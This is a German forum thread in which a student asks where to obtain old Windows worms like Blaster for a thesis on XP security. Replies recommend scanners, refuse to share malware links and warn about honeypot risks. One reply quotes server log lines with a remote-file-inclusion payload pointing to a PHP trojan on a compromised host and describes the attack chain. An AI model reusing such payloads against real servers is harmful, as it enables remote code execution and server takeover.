Win XP - brauche Blaster & Co für Penetrationstest - Diplomarbeit

[uNsEcUrE]

Hallo erstmal an alle!

Ich bin gerade dabei, eine Diplomarbeit zu schreiben. Teil dieser Diplomarbeit soll sein, verschiedenste "Versionen" von Windows XP und Windows Server 2003 auf deren "Sicherheit" zu testen.
Meine Vorstellung:

Ich "teste":
Win XP Prof. OHNE SP
Win XP Prof. mit SP1
Win XP Prof. mit SP2
Win XP Prof. mit SP2 + alle Updates

usw. usf.
Könnt ihr euch das mal vorstellen?

Unter "testen" stell ich mir vor, die Systeme
1.) einfach ins Netz zuhängen, "normal" surfen, arbeiten usw.
2.) kritischere Seiten anzusurfen, Crack-Seiten, evt. XXX Seiten usw.
3.) einfache "Penetrationstests" durchlaufen zu lassen

Dann will ich vergleichen, wie sich die ver. Systeme unter den unterschiedlichen Bedingungen verhalten.

----------------------
Nun meine Fragen:

1.) Was haltet ihr generell davon? Bessere Ideen/Vorschläge?
2.) WIE kann ich solche Tests sinnvoll machen/Wie gestalte ich diese Penetrationstests?
3.) Wo bekomme ich Viren/Würmer etc. her *ggg* Blaster und Co...?
Bei den Viren ist mir wichtig, dass man davon etwas sehen sollte. Also ala Blaster & Co "Ihr PC wird in xx Sek heruntergefahren..." usw.
Ich hab schon viele Sysfucker etc. gefunden, jedoch fang ich damit nix an, weil ich die ja manuell starten muss.
Ich such jetz also eine Möglichkeit, wie ich mir zB den Blaster (bzw. einfach irgendeinen Virus/Wurm, der eine Sicherheitslücke von Win ausnutzt) von selbst einfange.

Also ich hab mir eigentlich gedacht, sobald ich das Win ohne SP ins Netz hänge, passiert das von selbst... Hm, denkste, nichts passiert.


Bei Google finde ich unter gewissen Suchwörtern natürlich nur Gegenmaßnahmen, also Removaltools, Securityfirmen usw.

Auf den Crackseiten dasselbe....
Wenn man sich nichts einfangen will,erwischt man auf den Crack-Seiten immer Viren - braucht man mal Viren, findet man natürlich nur die einwandfreisten und cleansten Cracks....
Aber das wär dann erst der nächste Schritt.

Vorerst bin ich also auf der Suche nach Viren, die Sicherheitslücken ausnutzen, die mittlerweile (mit SP1 und 2) schon geschlossen wurden, bei einem Win ohne SP aber noch auszunützen sein müssten!!


Bitte gebt mir Hinweise/Tipps/Vorschläge usw. was ich denn machen könnte!

Vielen Dank schon mal!


Zusatzinfo:

Ich mach das alles in VMs - über "Bridged" Network - kann das ein "Problem" dabei darstellen??

 

[bitmuncher]

Für Penetrationstesting würde ich Tools wie Nessus empfehlen. Wo du Würmer und Viren herbekommst, darf man leider hier in Deutschland aus rechtlichen Gründen nicht offiziell bekannt geben, da diese Tools mittlerweile verboten sind.

 

[uNsEcUrE]

Für Penetrationstesting würde ich Tools wie Nessus empfehlen. Wo du Würmer und Viren herbekommst, darf man leider hier in Deutschland aus rechtlichen Gründen nicht offiziell bekannt geben, da diese Tools mittlerweile verboten sind.

Na gut, dann könnte mir hier ja jemand sagen, wo er sich seine Viren eingefangen hat - und man sich aus diesem Grund nicht herumtreiben sollte

Danke dennoch für das Tool (also den Namen)

 

[Harry Boeck]

OK, vielleicht nicht der beste Vorschlag, aber vielleicht ein nutzbarer Anfang:

Ich bin heute gerade wieder über die Bemerkung gestolpert, daß die meisten umhergeisternden Viren und Würmer eh extrem veraltet sind (und damit genau den Kriterien entsprechen, die Du hier ansprichst).

Gleichzeitig (dadurch, daß es die meisten sind,) sollten sie die Masse der Angriffe auf Server und ähnliches ausmachen.

Also...
Ein Blick in eine Logdatei eines Servers bei Bekannten (zum Beispiel hier) (eine Logdatei zu analysieren - zumal wenn es eine eigene ist oder mit Erlaubnis passiert - ist recht weit von Straftat entfernt):

(Dies ist 20 Minuten alt)

2007-12-06 00:27:35 403 216.227.217.248 "libwww-perl/5.808" user:'-' prot:- auth:- ciph:-/- req:"GET /Server/SSL-Integration.html/blank.php?pag=http://cotine.net/id.txt?? HTTP/1.1" 355 ref:"-"
2007-12-06 00:27:36 403 216.227.217.248 "libwww-perl/5.808" user:'-' prot:- auth:- ciph:-/- req:"GET /blank.php?pag=http://cotine.net/id.txt?? HTTP/1.1" 327 ref:"-"
2007-12-06 00:27:36 403 216.227.217.248 "libwww-perl/5.808" user:'-' prot:- auth:- ciph:-/- req:"GET /Server/blank.php?pag=http://cotine.net/id.txt?? HTTP/1.1" 334 ref:"-"

Also...:

"216.227.217.248" - der Rechner, von dem der Einbruchsversuch ausgeht, gehört zu:

OrgName:    ADDD2NET COM INC DBA LUNARPAGES 
OrgID:      ACIDL
Address:    Add2Net, Inc.
Address:    Lunarpages Division
Address:    100 East La Habra Blvd.
City:       La Habra
StateProv:  CA
PostalCode: 90631
Country:    US

Wie wir sehen können, diesmal kein böser chinesischer Volksarmee-Soldat, sondern ein lieber amerikanischer Volksgenosse... (/sarkasmus)

"http://cotine.net" ist der Server irgendeiner Firma, der gerade gehackt wurde.
Eine entsprechende Bemerkung prangt gerade eben deutlich sichtbar auf der Einstiegsseite, die wohl vorher mal anders ausgesehen hatte...

http://cotine.net/id.txt ist ein Trojaner. In PHP.
Er stellt die erste Stufe eines mittlerweile mehrstufigen Systems zum Befall von Servern dar. Er ermittelt erstmal nichts weiter als das Betriebssystem. FALLS der Ziel-Server dermaßen brutal versaut eingestellt ist, daß es möglich ist, sowas als PHP-Code dort auszuführen.

WENN er auf dem Zielsystem zur Ausführung kommt, was in diesem Fall mit Hilfe einer Datei "blank.php" versucht wird, die zu welchem PHP-Modul gehört?...Wordpress? Nein. Zumindest nicht aktuell. Leider ist Google bei so einem kurzen Dateinamen nicht sehr hilfreich (es betrachtet den Punkt als Wildcard)...
Na ja, jedenfalls wird irgendein bekanntes, vielbenutztes PHP-Anwendungssystem vorausgesetzt UND DAZU ein nahezu unkonfigurierter Server - z.B. XAMPP in Rohform mit allen Verbrechen von Konfigurationsfehlern, die man sich nur denken kann.

P.S.: http://osvdb.org/displayvuln.php?osvdb_id=29041
(reichlich 1 Jahr alt)

Der nächste Schritt in so einem Fall ist dann, daß von diesem oder einem anderen Server ein weiteres Script nachgeladen wird, welches eine "remote shell" darstellt und eine bequeme Weboberfläche für die Cracker darstellt, alle möglichen Anweisungen auf Betriebssystemebene auszuführen und den EIGENTLICHEN Trojaner darstellt. DER lädt dann weiteren Schadcode, der endgültig und dauerhaft im Betriebssystem, diesmal auf Treiber- oder zumindest Dienstebene, etwas installiert, was manchmal wie eine Art Server funktioniert (wenns weniger gut gemacht ist) oder aber für Verbindungen abwartet, bis sich ein Programm (Server oder Browser oder was auch immer) eh ins Internet aufmacht, um dem das eine oder andere Datenpaket mit unterzuschmuggeln (wobei meine Ahnung an dieser Stelle ihre momentane Grenze findet).

Was DU machen könntest, ist, diesen Leuten eben einen Server hinzustellen, der hinreichend versaut eingestellt IST. (Einen sogenannten "Honigtopf"...)

Wenn Du etwas davon haben willst, brauchst Du aber mindestens noch den einen oder anderen sauberen Rechner zum überwachen des Honigtopfes und seiner Verbindungen. Virtuelle Maschinen eignen sich dafür (also: als Honigtopf, nicht als der Überwacher! Das muß das Basissystem sein!) hervorragend.

Weitere Ideen müssen allerdings von Leuten kommen, die mehr Erfahrung haben.
Schau mal rein in den Thread...(siehe Beitrag weiter unten...)

 

[bitmuncher]

Jo, und da uNsEcUrE sich vermutlich mit Servern so gut wie garnicht auskennt (nur eine Annahme, bitte nicht persönlich nehmen), dürfte damit eine weitere Spamschleuder am Netz sein, auf der uNsEcUrE mangels Wissen nicht nachvollziehen kann, was tatsächlich passiert. Im Worst-Case stehen 1-2 Tage später die Herren in Grün auf der Matte mit einer Anzeige, weil irgendwer von diesem Server aus ge'DOS't, zugespammt oder gar gehackt wurde.

Es mag absurd klingen... aber gerade Honeypots müssen besonders gut gesichert sein, damit mit dem Honeypot nicht woanders Schaden angerichtet wird. Verantwortlich ist nämlich immer der Eigentümer des Rechners/Servers.

 

[Harry Boeck]

Oh, sorry, ja: Mir war gar nicht aufgefallen, daß "uNsEcUrE" im Schüleralter ist.

Ich hoffe mal, das kommt jetzt nicht falsch an (Asche auf mein Haupt)...
Ich habe sie wahrscheinlich zugeschüttet.

OK, trotzdem: Es ist ein interessantes Thema.
Sie sollte vielleicht doch im Thread Einbruchsvarianten in Netzwerke
mal reinschauen.

Nochwas: Einen Honigtopf aufsetzen könnte gemeinsam mit einem Betreuer eine interessante Sache sein. Was bitmuncher sagt zur Absicherung ist wichtig.

Was er zur Polizei sagt, bezieht sich NICHT darauf, jenen Server mal eben anzuschauen (dem seine Seite ist nicht per se gefährlich - es liegen halt nur ein paar Dateien rum, die in ANDEREN Zielsystemen gefährliche Wirkung entfalten könnten - wenn man sie ließe).

Aber es bezieht sich darauf, einen Honigtopf ohne hinreichend Vorsicht und Ahnung aufzusetzen und den dann im Netz werkeln zu lassen (und dadurch eventuell weitere unschuldige Leute zu gefährden).

Wenn allerdings das ganze sorgfältig als gemeinsames Experiment an der Schule gemacht wird, kann ich das nur gut heißen und bewundern. Besser kann man die Wirkungsweise von solchen Schädlingen nicht erlernen.

Ach ja, nochwas: Auch die eingangs genannten Ideen stellen natürlich allesamt Honigtöpfe dar. Wenn wir also die Sache hier diskutieren, macht das die Gesamtwirkung auf keinen Fall schlimmer, als wenn wir uns hier verklemmt eine Stellungnahme aus Altersgründen oder so verkneifen und die Schüler(innen) dann aus Frust und mangels besserer Ideen ihre ohnehin schon gestarteten Experimente fortsetzen.

DANN lieber: Bleib hier, löcher uns und hole Dir die Anleitung, die Du brauchst, um es richtig zu machen!

----

So, jetzt nochmal ein Nachtrag: Unsecure ist ja schon ein ziemlich langjähriges Mitglied des Hackerboards. Ich habe nach kurzem Stöbern keinerlei Bedenken (mehr), daß sie oder er (den Themen nach) etwas unvorsichtiges anstellen könnte. Ich würde dahingehend also für Entwarnung plädieren. Außerdem: Aus dem Schulalter wohl längst raus (das Profil scheint etwas alt zu sein).

 

[bitmuncher]

Original von Harry Boeck
So, jetzt nochmal ein Nachtrag: Unsecure ist ja schon ein ziemlich langjähriges Mitglied des Hackerboards. Ich habe nach kurzem Stöbern keinerlei Bedenken (mehr), daß sie oder er (den Themen nach) etwas unvorsichtiges anstellen könnte. Ich würde dahingehend also für Entwarnung plädieren. Außerdem: Aus dem Schulalter wohl längst raus (das Profil scheint etwas alt zu sein).

Da es um eine Diplomarbeit geht, ging ich nicht vom Schulalter aus. Allerdings weiss ich nunmal aus Erfahrung wie komplex das Aufsetzen von Honeypots sein kann und ich weiss daher auch, dass einiges an Erfahrung dazu gehört. Abgesehen davon geht es "nur" darum ein paar Viren/Trojaner/Würmer zu finden und die Sicherheit von "üblichen" Windows-Rechnern zu testen und nicht irgendwelche Angriffsszenarien auf Server nachzuvollziehen. Ich halte daher einen Honeypot für absolut unnötig. Trotzdem sollten hier keine Links zu Seiten gepostet werden, die solcherlei Schadsoftware verbreiten. Beschränkt euch bitte in dieser Hinsicht auf PNs, damit nicht ausversehen andere (unerfahrene) User den falschen Link anklicken und sich ihre Rechner verseuchen.

 

[Gulliver]

@UNsecure

Hast Post

 

[uNsEcUrE]

Hello, und erstmal danke für die zahlreiche Teilnahme am Thema

Zu meinem Alter, Wissensstand usw.:

Jo, und da uNsEcUrE sich vermutlich mit Servern so gut wie garnicht auskennt (nur eine Annahme, bitte nicht persönlich nehmen), dürfte damit eine weitere Spamschleuder am Netz sein, auf der uNsEcUrE mangels Wissen nicht nachvollziehen kann, was tatsächlich passiert. Im Worst-Case stehen 1-2 Tage später die Herren in Grün auf der Matte mit einer Anzeige, weil irgendwer von diesem Server aus ge'DOS't, zugespammt oder gar gehackt wurde. Augen rollen

Also mein Wissen bzgl Windows Servern hält sich in Grenzen. Ich kann ein Windows Netzwerk inkl. Domäne planen, erstellen und verwalten usw. - gehts aber jetz um so spezielle Sicherheitsfragen bzw. schon um größer dimensionierte Absicherung eines Win-NW... pff - das will ich mir absolut nicht zutrauen!

So, jetzt nochmal ein Nachtrag: Unsecure ist ja schon ein ziemlich langjähriges Mitglied des Hackerboards. Ich habe nach kurzem Stöbern keinerlei Bedenken (mehr), daß sie oder er (den Themen nach) etwas unvorsichtiges anstellen könnte. Ich würde dahingehend also für Entwarnung plädieren. Außerdem: Aus dem Schulalter wohl längst raus (das Profil scheint etwas alt zu sein).

Wie gesagt, ich bin wirklich noch Schülerin (allerdings im letzten Jahr - bin übrigens fast 19) und hab nur begrenzt praxisnahe Erfahrung.
Mit dieser Diplomarbeit (im Rahmen der Matura) wollte ich mich einfach näher mit der "Sicherheit von Windows" bzw. der allgemeinen Situation im Bereich Sicherheitsmaßnahmen usw. beschäftigen.
Ich weiß zwar sehr wohl, was ich tun und was ich eher lassen sollte - die Detailinfos zu Viren & Co fehlen mir allerdings.
Und wegen böser Absichten oder so: es handelt sich hierbei wirklich rein um Interesse und Recherche für die Diplomarbeit!


So, und jetzt zum Thema:

@ Honeypots usw.
Das halte ich ja generell für ne nicht so schlechte Idee, allerdings könnt ich glaube ich über das alleine schon ne Diplomarbeit schreiben
Abgesehen von der Arbeit, müsste ich mir dazu noch einiges an Wissen aneignen.

Ich will eigentlich wirklich nur
1.) nachvollziehen können (testen), dass Viren/Würmer im Nu auf Win-Systemen ohne Schutz sind (also ala "Ihr PC wird in 30sek... ) usw.
2.) nachvollziehen können, dass das bei SP2 schon mal nicht so einfach ist
3.) Maßnahmen zeigen, die das Risiko noch weiter senken (Firewall, Updates usw.)


Na gut, is wiedermal n Roman geworden... sorry

@UNsecure
Hast Post

Danke Gulliver!

 

[benediktibk]

Original von uNsEcUrE
Ich will eigentlich wirklich nur
1.) nachvollziehen können (testen), dass Viren/Würmer im Nu auf Win-Systemen ohne Schutz sind (also ala "Ihr PC wird in 30sek... ) usw.
2.) nachvollziehen können, dass das bei SP2 schon mal nicht so einfach ist
3.) Maßnahmen zeigen, die das Risiko noch weiter senken (Firewall, Updates usw.)

Interessante Diplom-Arbeit, nachdem das Ergebnis schon fest steht.
Vielleicht solltest du etwas unvoreingenommener an die Arbeit ran gehen, um realitätsnähere und damit vermutlich auch besser benotete Ergebnisse zu erhalten.

 

[uNsEcUrE]

Original von benediktibk

Original von uNsEcUrE
Ich will eigentlich wirklich nur
1.) nachvollziehen können (testen), dass Viren/Würmer im Nu auf Win-Systemen ohne Schutz sind (also ala "Ihr PC wird in 30sek... ) usw.
2.) nachvollziehen können, dass das bei SP2 schon mal nicht so einfach ist
3.) Maßnahmen zeigen, die das Risiko noch weiter senken (Firewall, Updates usw.)

Interessante Diplom-Arbeit, nachdem das Ergebnis schon fest steht.
Vielleicht solltest du etwas unvoreingenommener an die Arbeit ran gehen, um realitätsnähere und damit vermutlich auch besser benotete Ergebnisse zu erhalten.

Dieser Teil der DA dient nur zum Einstieg, und ist wie gesagt nur ein TEIL der Diplomarbeit. Es geht also in der DA nicht darum, Viren auf Win zu bringen und dann Maßnahmen dagegen (die eh schon jeder kennt) neu zu erfinden!